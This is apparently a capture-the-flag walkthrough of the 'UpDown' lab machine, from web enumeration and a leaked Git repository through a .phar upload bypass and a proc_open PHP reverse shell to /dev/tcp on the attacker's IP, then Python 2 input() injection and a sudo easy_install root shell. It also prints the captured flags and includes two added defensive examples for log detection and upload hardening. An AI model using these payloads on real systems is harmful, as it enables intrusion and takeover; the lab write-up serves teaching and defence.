Proof of Concept

10.129.227.227

Nmap

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Initial Access

Connecting to the web service on port 80 reveals a domain name

  • siteisup.htb

┌──(kali㉿kali)-[~/UpDown]
└─$ curl http://10.129.227.227
<!DOCTYPE html>
<html>
 
  <head>
    <meta charset='utf-8' />
    <meta http-equiv="X-UA-Compatible" content="chrome=1" />
    <link rel="stylesheet" type="text/css" media="screen" href="stylesheet.css">
    <title>Is my Website up ?</title>
  </head>
 
  <body>
 
    <div id="header_wrap" class="outer">
        <header class="inner">
          <h1 id="project_title">Welcome,<br> Is My Website UP ?</h1>
          <h2 id="project_tagline">Here you can check if your website is up or down.</h2>
        </header>
    </div>
 
    <div id="main_content_wrap" class="outer">
      <section id="main_content" class="inner">
        <form method="POST">
			<label>Website to check:</label><br><br>
			<input type="text" name="site" value="" placeholder="http://google.com">
			<input type="checkbox" id="debug" name="debug" value="1">
			<label for="debug"> Debug mode  (On/Off) </label><br>
			<input type="submit" value="Check">
		</form>
 
      </section>
    </div>
 
    <div id="footer_wrap" class="outer">
      <footer class="inner">
        <p class="copyright">siteisup.htb</p><br>
      </footer>
    </div>
 
  </body>
</html> 

Configure the /etc/hosts file

┌──(kali㉿kali)-[~/UpDown]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.227.227	siteisup.htb

Subdomain enumeration finds dev.siteisup.htb

┌──(kali㉿kali)-[~/UpDown]
└─$ gobuster vhost -u http://siteisup.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --ad -t 100
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                       http://siteisup.htb
[+] Method:                    GET
[+] Threads:                   100
[+] Wordlist:                  /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent:                gobuster/3.8
[+] Timeout:                   10s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
dev.siteisup.htb Status: 403 [Size: 281]
#www.siteisup.htb Status: 400 [Size: 301]
#mail.siteisup.htb Status: 400 [Size: 301]
Progress: 19966 / 19966 (100.00%)
===============================================================
Finished
===============================================================

Add the subdomain to the /etc/hosts file

┌──(kali㉿kali)-[~/UpDown]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.227.227	siteisup.htb	dev.siteisup.htb

Accessing http://dev.siteisup.htb returns a 403 error

┌──(kali㉿kali)-[~/UpDown/git-dumper/.git]
└─$ curl http://dev.siteisup.htb
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at dev.siteisup.htb Port 80</address>
</body></html>

Directory enumeration of http://siteisup.htb finds http://siteisup.htb/dev/.git/HEAD

┌──(kali㉿kali)-[~/UpDown]
└─$ feroxbuster -u http://siteisup.htb -t 100 -s 200 -w /usr/share/dirb/wordlists/common.txt
 
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://siteisup.htb/
 🚩  In-Scope Url          │ siteisup.htb
 🚀  Threads               │ 100
 📖  Wordlist              │ /usr/share/dirb/wordlists/common.txt
 👌  Status Codes          │ [200]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET      320l      675w     5531c http://siteisup.htb/stylesheet.css
200      GET       40l       93w     1131c http://siteisup.htb/
200      GET        1l        2w       21c http://siteisup.htb/dev/.git/HEAD
200      GET       40l       93w     1131c http://siteisup.htb/index.php
200      GET        0l        0w        0c http://siteisup.htb/dev/index.php
[####################] - 35s     9233/9233    0s      found:5       errors:135
[####################] - 31s     4614/4614    150/s   http://siteisup.htb/
[####################] - 28s     4614/4614    165/s   http://siteisup.htb/dev/ 

Dump the Git repository

┌──(kali㉿kali)-[~/UpDown/git-dumper]
└─$ git-dumper http://siteisup.htb/dev/.git/ .
[-] Testing http://siteisup.htb/dev/.git/HEAD [200]
[-] Testing http://siteisup.htb/dev/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://siteisup.htb/dev/.git/ [200]
[-] Fetching http://siteisup.htb/dev/.gitignore [404]
[-] http://siteisup.htb/dev/.gitignore responded with status code 404
[-] Fetching http://siteisup.htb/dev/.git/packed-refs [200]
[-] Fetching http://siteisup.htb/dev/.git/HEAD [200]
[-] Fetching http://siteisup.htb/dev/.git/branches/ [200]
[-] Fetching http://siteisup.htb/dev/.git/config [200]
[-] Fetching http://siteisup.htb/dev/.git/description [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/ [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/ [200]
[-] Fetching http://siteisup.htb/dev/.git/info/ [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/ [200]
[-] Fetching http://siteisup.htb/dev/.git/index [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/ [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/pack/ [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/info/ [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-commit.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/commit-msg.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/post-update.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/info/exclude [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-push.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-receive.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/update.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/ [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/remotes/ [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/HEAD [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/heads/ [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/tags/ [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/pack/pack-30e4e40cb7b0c696d1ce3a83a6725267d45715da.pack [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/pack/pack-30e4e40cb7b0c696d1ce3a83a6725267d45715da.idx [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/remotes/origin/ [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/heads/ [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/heads/main [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/remotes/ [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/remotes/origin/HEAD [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/heads/main [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/remotes/origin/ [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/remotes/origin/HEAD [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 6 paths from the index
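From the defender's side, the git-dumper run above leaves a distinctive trace in the Apache access log: one client fetching a run of /.git/ paths and being answered with 200. The following is an added example (not part of the original writeup) that parses combined-format log lines and reports clients that were actually served repository files, separating them from a single 404 probe; the log lines are constructed for the example and the pack file name is the one from the dump above.

```python
import re
from collections import defaultdict

# Apache combined log format, as used by the Apache/2.4.41 server on this box.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Matches "/.git" as a path component; "/.gitignore" is deliberately not matched.
GIT_PATH_RE = re.compile(r"/\.git(/|$)")


def parse_line(line):
    """Return the log fields as a dict, or None for a line that is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_git_exposure(lines, min_hits=3):
    """Group /.git/ requests by client and report clients that received at least
    min_hits 2xx answers. A probe answered with 404 is noise; a run of 200s for
    HEAD, config and objects/pack/* means the repository really was downloaded."""
    per_client = defaultdict(lambda: {"probes": 0, "served": 0, "paths": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not GIT_PATH_RE.search(rec["path"]):
            continue
        client = per_client[rec["ip"]]
        client["probes"] += 1
        if rec["status"].startswith("2"):
            client["served"] += 1
            client["paths"].add(rec["path"])
    findings = []
    for ip, client in sorted(per_client.items()):
        if client["served"] >= min_hits:
            findings.append({
                "ip": ip,
                "served": client["served"],
                "probes": client["probes"],
                # A served pack file means the full history left the server.
                "pack_downloaded": any("/objects/pack/" in p for p in client["paths"]),
            })
    return findings


# Constructed sample log lines modelled on the git-dumper run (not real server logs).
SAMPLE_LOG = """\
10.10.14.248 - - [17/Feb/2026:18:10:01 +0000] "GET /dev/.git/HEAD HTTP/1.1" 200 21 "-" "git-dumper"
10.10.14.248 - - [17/Feb/2026:18:10:01 +0000] "GET /dev/.git/config HTTP/1.1" 200 300 "-" "git-dumper"
10.10.14.248 - - [17/Feb/2026:18:10:02 +0000] "GET /dev/.git/objects/pack/pack-30e4e40cb7b0c696d1ce3a83a6725267d45715da.pack HTTP/1.1" 200 9876 "-" "git-dumper"
10.10.14.248 - - [17/Feb/2026:18:10:02 +0000] "GET /dev/.gitignore HTTP/1.1" 404 281 "-" "git-dumper"
203.0.113.9 - - [17/Feb/2026:18:11:00 +0000] "GET /.git/HEAD HTTP/1.1" 404 281 "-" "Mozilla/5.0"
10.129.0.5 - - [17/Feb/2026:18:12:00 +0000] "GET /index.php HTTP/1.1" 200 1131 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in find_git_exposure(SAMPLE_LOG.splitlines()):
        print(finding)
```

The same rule applied to a real log should be paired with the fix: block /.git/ in the vhost (or never deploy the working tree) so every such request is a 403, which the function then ignores.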

Among the dumped Git files, .htaccess shows that the web server requires the “Special-Dev: only4dev” header

SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header

Adding the “Special-Dev: only4dev” header grants access to http://dev.siteisup.htb

┌──(kali㉿kali)-[~/UpDown/git-dumper/.git]
└─$ curl -H "Special-Dev: only4dev" http://dev.siteisup.htb
<b>This is only for developers</b>
<br>
<a href="?page=admin">Admin Panel</a>
<!DOCTYPE html>
<html>
 
  <head>
    <meta charset='utf-8' />
    <meta http-equiv="X-UA-Compatible" content="chrome=1" />
    <link rel="stylesheet" type="text/css" media="screen" href="stylesheet.css">
    <title>Is my Website up ? (beta version)</title>
  </head>
 
  <body>
 
    <div id="header_wrap" class="outer">
        <header class="inner">
          <h1 id="project_title">Welcome,<br> Is My Website UP ?</h1>
          <h2 id="project_tagline">In this version you are able to scan a list of websites !</h2>
        </header>
    </div>
 
    <div id="main_content_wrap" class="outer">
      <section id="main_content" class="inner">
        <form method="post" enctype="multipart/form-data">
			    <label>List of websites to check:</label><br><br>
				<input type="file" name="file" size="50">
				<input name="check" type="submit" value="Check">
		</form>
 
      </section>
    </div>
 
    <div id="footer_wrap" class="outer">
      <footer class="inner">
        <p class="copyright">siteisup.htb (beta)</p><br>
        <a class="changelog" href="changelog.txt">changelog.txt</a><br>
      </footer>
    </div>
 
  </body>
</html> 

Reviewing checker.php from the previously dumped Git repository shows that it reads each line of the uploaded file as a URL, sends an HTTP request with cURL to check whether the site is up, and then deletes the file that was temporarily stored under uploads/[md5(time())]/

<SNIP>
 
# Create directory to upload our file.
$dir = "uploads/".md5(time())."/";
if(!is_dir($dir)){
	mkdir($dir, 0770, true);
}
# Upload the file.
$final_path = $dir.$file;
move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}");
# Read the uploaded file.
$websites = explode("\n",file_get_contents($final_path));
foreach($websites as $site){
	$site=trim($site);
	if(!preg_match("#file://#i",$site) && !preg_match("#data://#i",$site) && !preg_match("#ftp://#i",$site)){
		$check=isitup($site);
		if($check){
			echo "<center>{$site}<br><font color='green'>is up ^_^</font></center>";
		}else{
			echo "<center>{$site}<br><font color='red'>seems to be down :(</font></center>";
		}  
	}else{
		echo "<center><font color='red'>Hacking attempt was detected !</font></center>";
	}
}
# Delete the uploaded file.
@unlink($final_path);
    
<SNIP>

The upload check rejects extensions that PHP would execute, but phar is missing from the list, so it can be bypassed

<SNIP>
 
# Check if extension is allowed.
$ext = getExtension($file);
if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
	die("Extension not allowed!");
}
    
<SNIP>
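The two checker.php fragments above share one root cause: a denylist that names what it happens to think of, plus a deletion step that only runs after every URL has been contacted. The following is an added example in Python (not the box's checker.php, which is PHP): it reproduces the page's denylist regex to show that shell.phar passes it, places an exact allowlist check beside it, and rewrites the check loop so the uploaded list lives outside the web root and is removed in a finally block. The fetch callback, the file names and the temp-file layout are assumptions made for the example.

```python
import os
import re
import tempfile

# The denylist regex from the page's checker.php: case-insensitive and unanchored,
# so it rejects only what it names. "phar" is absent, yet Apache on this box hands
# .phar files to the PHP interpreter.
DENYLIST_RE = re.compile(r"php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar", re.I)

# Hardened rule: the feature only needs a plain-text list of URLs, so accept exactly
# one known-safe extension and only web URL schemes; everything else is rejected.
ALLOWED_EXTENSIONS = {"txt"}
ALLOWED_SCHEMES = ("http://", "https://")


def get_extension(filename: str) -> str:
    """Text after the final dot, or "" when there is none (like the page's getExtension())."""
    _, dot, ext = filename.rpartition(".")
    return ext if dot else ""


def denylist_allows(filename: str) -> bool:
    """The page's check: the upload passes unless its extension matches the denylist."""
    return DENYLIST_RE.search(get_extension(filename)) is None


def allowlist_allows(filename: str) -> bool:
    """Hardened check: the upload passes only if its extension is exactly an allowed one."""
    return get_extension(filename).lower() in ALLOWED_EXTENSIONS


def check_sites(upload: bytes, fetch):
    """Hardened version of the loop in checker.php.

    The list goes to a private temp file outside the web root instead of a
    guessable uploads/md5(time())/ directory, URLs pass by scheme allowlist rather
    than a file://, data://, ftp:// denylist, and the file is deleted in `finally`,
    so a slow target cannot keep it alive where it is reachable over HTTP.
    `fetch(url) -> bool` is injected so the example runs offline.
    Returns (results, cleaned_up)."""
    fd, path = tempfile.mkstemp(prefix="siteisup-", suffix=".txt")
    results = []
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(upload)
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                site = line.strip()
                if not site:
                    continue
                if not site.lower().startswith(ALLOWED_SCHEMES):
                    results.append((site, "rejected"))
                    continue
                results.append((site, "up" if fetch(site) else "down"))
    finally:
        try:
            os.unlink(path)
        except FileNotFoundError:
            pass
    return results, not os.path.exists(path)


if __name__ == "__main__":
    for name in ("sites.txt", "shell.php", "shell.phar", "noext"):
        print(name, "denylist:", denylist_allows(name), "allowlist:", allowlist_allows(name))
```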

Write arbitrary PHP code. To keep the file from being deleted, append the attacker server address so that an HTTP request is sent to the attacker server

┌──(kali㉿kali)-[~/UpDown]
└─$ cat shell.phar
<?php echo phpinfo(); ?>
http://10.10.14.248

Start a listener on port 80 on the attacker server with the -k option so the HTTP request is not closed, then upload shell.phar: an HTTP request arrives at the attacker server, and the undeleted shell.phar file can be found under the http://dev.siteisup.htb/uploads/ directory

┌──(kali㉿kali)-[~/UpDown/git-dumper/.git]
└─$ rlwrap nc -nlvkp 80
listening on [any] 80 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.227.227] 60246
GET / HTTP/1.1
Host: 10.10.14.248
User-Agent: siteisup.htb beta
Accept: */*

Accessing the uploaded shell.phar file shows the PHP server configuration, and the disable_functions entry lists the disabled functions

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,error_log,system,exec,shell_exec,popen,passthru,link,symlink,syslog,ld,mail,stream_socket_sendto,dl,stream_socket_client,fsockopen

Checking with Dfunc-Bypasser for functions that can still execute system commands shows that proc_open can be used to bypass the restriction

┌──(kali㉿kali)-[~/UpDown/dfunc-bypasser]
└─$ python2 dfunc-bypasser.py --file ../phpinfo.html
 
 
                                ,---,
                                  .'  .' `\
                                  ,---.'     \
                                  |   |  .`\  |
                                  :   : |  '  |
                                  |   ' '  ;  :
                                  '   | ;  .  |
                                  |   | :  |  '
                                  '   : | /  ;
                                  |   | '` ,/
                                  ;   :  .'
                                  |   ,.'
                                  '---'
 
 
			authors: __c3rb3ru5__, $_SpyD3r_$
 
 
Please add the following functions in your disable_functions option:
proc_open
If PHP-FPM is there stream_socket_sendto,stream_socket_client,fsockopen can also be used to be exploit by poisoning the request to the unix socket

Write a PHP reverse shell using the proc_open function

┌──(kali㉿kali)-[~/UpDown]
└─$ cat revshell.phar
<?php
$shell = 'bash -c "sh -i >& /dev/tcp/10.10.14.248/4444 0>&1"';
 
$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("pipe", "w")
);
 
$process = proc_open($shell, $descriptorspec, $pipes);
?>
 
http://10.10.14.248
 

As before, start a listener on port 80 on the attacker server with the -k option so the HTTP request is not closed, then upload the file

┌──(kali㉿kali)-[~/UpDown]
└─$ rlwrap nc -nlvkp 80
listening on [any] 80 ...

Start an nc reverse shell listener and access the uploaded revshell.phar; the reverse shell connects

┌──(kali㉿kali)-[/usr/share/dirb/wordlists]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
 
connect to [10.10.14.248] from (UNKNOWN) [10.129.227.227] 60482
sh: 0: can't access tty; job control turned off
$

Auth as developer

Searching for SetUID binaries finds /home/developer/dev/siteisup, which is owned by developer and executable by the www-data user

www-data@updown:/$ find / -type f -perm -4000 -exec ls -l {} \; 2>/dev/null
find / -type f -perm -4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-- 1 root messagebus 51344 Apr 29  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 22840 Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 473576 Mar 30  2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 53040 Mar 14  2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 67816 Feb  7  2022 /usr/bin/su
-rwsr-xr-x 1 root root 39144 Feb  7  2022 /usr/bin/umount
-rwsr-xr-x 1 root root 166056 Jan 19  2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 88464 Mar 14  2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39144 Mar  7  2020 /usr/bin/fusermount
-rwsr-sr-x 1 daemon daemon 55560 Nov 12  2018 /usr/bin/at
-rwsr-xr-x 1 root root 68208 Mar 14  2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 44784 Mar 14  2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 85064 Mar 14  2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 55528 Feb  7  2022 /usr/bin/mount
-rwsr-x--- 1 developer www-data 16928 Jun 22  2022 /home/developer/dev/siteisup

Analysis of the /home/developer/dev/siteisup binary shows that it executes /home/developer/dev/siteisup_test.py

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __gid_t rgid; // [rsp+28h] [rbp-8h]
  __uid_t ruid; // [rsp+2Ch] [rbp-4h]
 
  rgid = getegid();
  ruid = geteuid();
  setresgid(rgid, rgid, rgid);
  setresuid(ruid, ruid, ruid);
  puts("Welcome to 'siteisup.htb' application\n");
  system("/usr/bin/python /home/developer/dev/siteisup_test.py");
  return 0;
}

Analysis of /home/developer/dev/siteisup_test.py shows that it sends a GET request to the URL read by the input function. The file is run with Python 2, and in that version input() evaluates the entered text as a Python expression, so the value can be executed as Python code

import requests
 
url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"

Run the /home/developer/dev/siteisup binary and enter Python code to obtain a shell as the developer user

www-data@updown:/$ /home/developer/dev/siteisup
/home/developer/dev/siteisup
Welcome to 'siteisup.htb' application
 
Enter URL here:__import__('os').system('/bin/sh')
__import__('os').system('/bin/sh')
$ whoami
whoami
developer

Find the developer user's SSH key

developer@updown:/home/developer/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
<SNIP>
-----END OPENSSH PRIVATE KEY-----

SSH login succeeds using the obtained SSH key

┌──(kali㉿kali)-[~/UpDown]
└─$ ssh developer@10.129.227.227 -i id_rsa
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-122-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Tue Feb 17 18:23:59 UTC 2026
 
  System load:           0.14
  Usage of /:            50.9% of 2.84GB
  Memory usage:          26%
  Swap usage:            0%
  Processes:             231
  Users logged in:       0
  IPv4 address for eth0: 10.129.227.227
  IPv6 address for eth0: dead:beef::250:56ff:feb0:bf92
 
  => There is 1 zombie process.
 
 
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
 
Last login: Tue Feb 17 18:23:50 2026 from 10.10.14.248
developer@updown:~$

Read user.txt

developer@updown:~$ cat user.txt
649073c071852d29ab6e3f2537d1bfd7
developer@updown:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:bf:92 brd ff:ff:ff:ff:ff:ff
    inet 10.129.227.227/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3406sec preferred_lft 3406sec
    inet6 dead:beef::250:56ff:feb0:bf92/64 scope global dynamic mngtmpaddr
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:feb0:bf92/64 scope link
       valid_lft forever preferred_lft forever

Privilege Escalation

Confirm that /usr/local/bin/easy_install can be run with sudo

developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User developer may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/local/bin/easy_install

Obtain a root shell using easy_install

developer@updown:~$ echo 'import os; os.system("exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty")' >setup.py
developer@updown:~$ sudo easy_install .
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing .
Writing /home/developer/setup.cfg
Running setup.py -q bdist_egg --dist-dir /home/developer/egg-dist-tmp-sbqor0
# id
uid=0(root) gid=0(root) groups=0(root)

Read root.txt

# cat /root/root.txt
a87a0599d456f55650ec14df912145fe
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:bf:92 brd ff:ff:ff:ff:ff:ff
    inet 10.129.227.227/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3227sec preferred_lft 3227sec
    inet6 dead:beef::250:56ff:feb0:bf92/64 scope global dynamic mngtmpaddr
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:feb0:bf92/64 scope link
       valid_lft forever preferred_lft forever